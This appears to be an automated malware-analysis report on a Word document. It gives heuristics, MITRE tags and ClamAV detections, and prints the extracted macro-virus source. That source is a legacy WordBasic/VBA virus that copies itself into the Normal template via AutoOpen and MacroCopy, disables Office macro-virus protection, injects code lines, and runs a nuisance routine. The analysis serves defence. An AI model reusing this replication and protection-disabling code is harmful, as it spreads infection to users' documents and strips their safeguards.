MALICIOUS
256
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains legacy WordBasic macro markers and VBA macros, including AutoOpen and Auto_Close, which are indicative of malicious intent. The critical heuristic for VBA macro-virus self-replication suggests the macro attempts to spread or tamper with the VBA project. ClamAV detections further confirm its malicious nature. The macro displays a fake input box, likely as a distraction or to gather user input, and its self-replication capability points towards a malicious document designed to spread.
Heuristics 6
-
ClamAV: Doc.Trojan.Twno-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Twno-1
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
tf.CodeModule.InsertLines i, a -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "AutoOpen" -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
WordBasic.MacroCopy filem$, "AutoClose" -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6758 bytes |
SHA-256: 61e0fad93e141c68ee742bf3e4fcca9e40304700e8663152f8bc7aa104929105 |
|||
|
Detection
ClamAV:
Doc.Trojan.Twno-3
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "AutoOpen"
Dim nm__()
Public Sub MAIN()
ReDim nm__(4)
Dim test
Dim con
Dim tog$
Dim i
Dim ans$
Dim j
Dim nor
Dim kk
Dim t
Dim file$
Dim filem$
Dim nor1
Dim kkk
Dim tt
WordBasic.DisableInput 1
If WordBasic.Day(WordBasic.Now()) = 97 Then
try:
On Error GoTo -1: On Error GoTo 0
On Error GoTo -1: On Error GoTo try
test = -1
con = 1
tog$ = ""
i = 0
While test = -1
For i = 0 To 4
nm__(i) = WordBasic.Int(Rnd() * 10000)
con = (con * nm__(i))
If i = 4 Then
tog$ = tog$ + Str(nm__(4)) + " =?"
GoTo beg
End If
tog$ = tog$ + Str(nm__(i)) + " *"
Next i
beg:
WordBasic.Beep
ans$ = WordBasic.[InputBox$]("¤µ¤Ñ¬O " + WordBasic.[Date$]() + " ,¸ò§Aª±¤@Ӥߺâ¹CÀ¸" + Chr(13) + _
"Y§Aµª¿ù,¥u¦n±µ¨ü¾_¾Ù±Ð¨|.............." + Chr(13) + _
tog$, "¥xÆW NO.1 Macro Virus")
If WordBasic.[RTrim$](WordBasic.[LTrim$](ans$)) = WordBasic.[LTrim$](Str(con)) Then
WordBasic.MsgBox "®¥¶P§Aµª¹ï¤F,«ö½T©w´N§i¶D§A·Qª¾¹Dªº....", _
"¥xÆW NO.1 Macro Virus"
WordBasic.FileNewDefault
WordBasic.CenterPara
WordBasic.FormatFont Font:="²Ó©úÅé", Points:=16, Bold:=1, Underline:=1
WordBasic.Beep
WordBasic.Insert "¦ó¿×¥¨¶°¯f¬r¡H"
WordBasic.InsertPara
WordBasic.Beep
WordBasic.Insert "µª®×:"
WordBasic.Italic 1
WordBasic.Insert "§Ú´N¬O....."
WordBasic.InsertPara
WordBasic.InsertPara
WordBasic.Italic 0
WordBasic.FormatFont Font:="²Ó©úÅé", Points:=16, Bold:=1, Underline:=1
WordBasic.Beep
WordBasic.Insert "¦p¦ó¹w¨¾¥¨¶°¯f¬r¡H"
WordBasic.InsertPara
WordBasic.Beep
WordBasic.Insert "µª®×:"
WordBasic.Italic 1
WordBasic.Insert "¤£n¬Ý§Ú....."
GoTo exit_
Else
For j = 1 To 20
WordBasic.Beep
WordBasic.FileNewDefault
Next j
WordBasic.CenterPara
WordBasic.FormatFont Font:="²Ó©úÅé", Points:=16, Bold:=1, Underline:=1
WordBasic.Insert "¥¨¶°¯f¬r"
GoTo try
End If
Wend
End If
nor = WordBasic.CountMacros(0)
If nor > 0 Then
For kk = 1 To nor
If WordBasic.[MacroName$](kk, 0) = "AutoOpen" Then
t = 1
End If
Next kk
End If
file$ = WordBasic.[FileName$]()
filem$ = file$ + ":AutoOpen"
If t <> 1 Then
WordBasic.MacroCopy filem$, "AutoOpen"
WordBasic.MacroCopy filem$, "AutoNew"
WordBasic.MacroCopy filem$, "AutoClose"
End If
nor1 = WordBasic.CountMacros(1)
If nor1 > 0 Then
For kkk = 1 To nor1
If WordBasic.[MacroName$](kkk, 1) = "AutoOpen" Then
tt = 1
End If
Next kkk
End If
If tt <> 1 Then
WordBasic.FileSaveAs Format:=1
WordBasic.MacroCopy "AutoOpen", filem$
End If
exit_:
End Sub
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
' Open Letter to the Virus Hunters
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
' This virus was written to help educate the
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
' millennium bug. Please do not update your
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
' until after December 1, 1999.
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
' I know you won't do that, but what the heck.
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
' I tried.
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
' Bye!
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
On Error Resume Next
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
s = ActiveDocument.Saved
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
Application.EnableCancelKey = Not -1
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
Randomize
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
If Dir("c:\sys00.bak", 6) = "" Then
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
For i = 1 To MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
Print #1, a
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
Close #1
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
End If
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'y2k" Then
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
ElseIf ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'y2k" Then
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
Else
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
End If
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
If tf <> "" Then
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
If LOF(1) = 0 Then GoTo q
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
Do While Not EOF(1)
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
tf.CodeModule.InsertLines i, a
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
Loop
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
Close #1
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
If ActiveDocument.Saved <> s Then ActiveDocument.Saved = s
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
hh = Hour(Now): mm = Minute(Now): ss = Second(Now)
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
' only display messages for 1999
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
GoTo end_here
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
If hh > 12 Then
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
End If
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
t$ = Chr(13) + Chr(13)
'april 1, 1999
If dd = 1 And mm = 4 Then
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.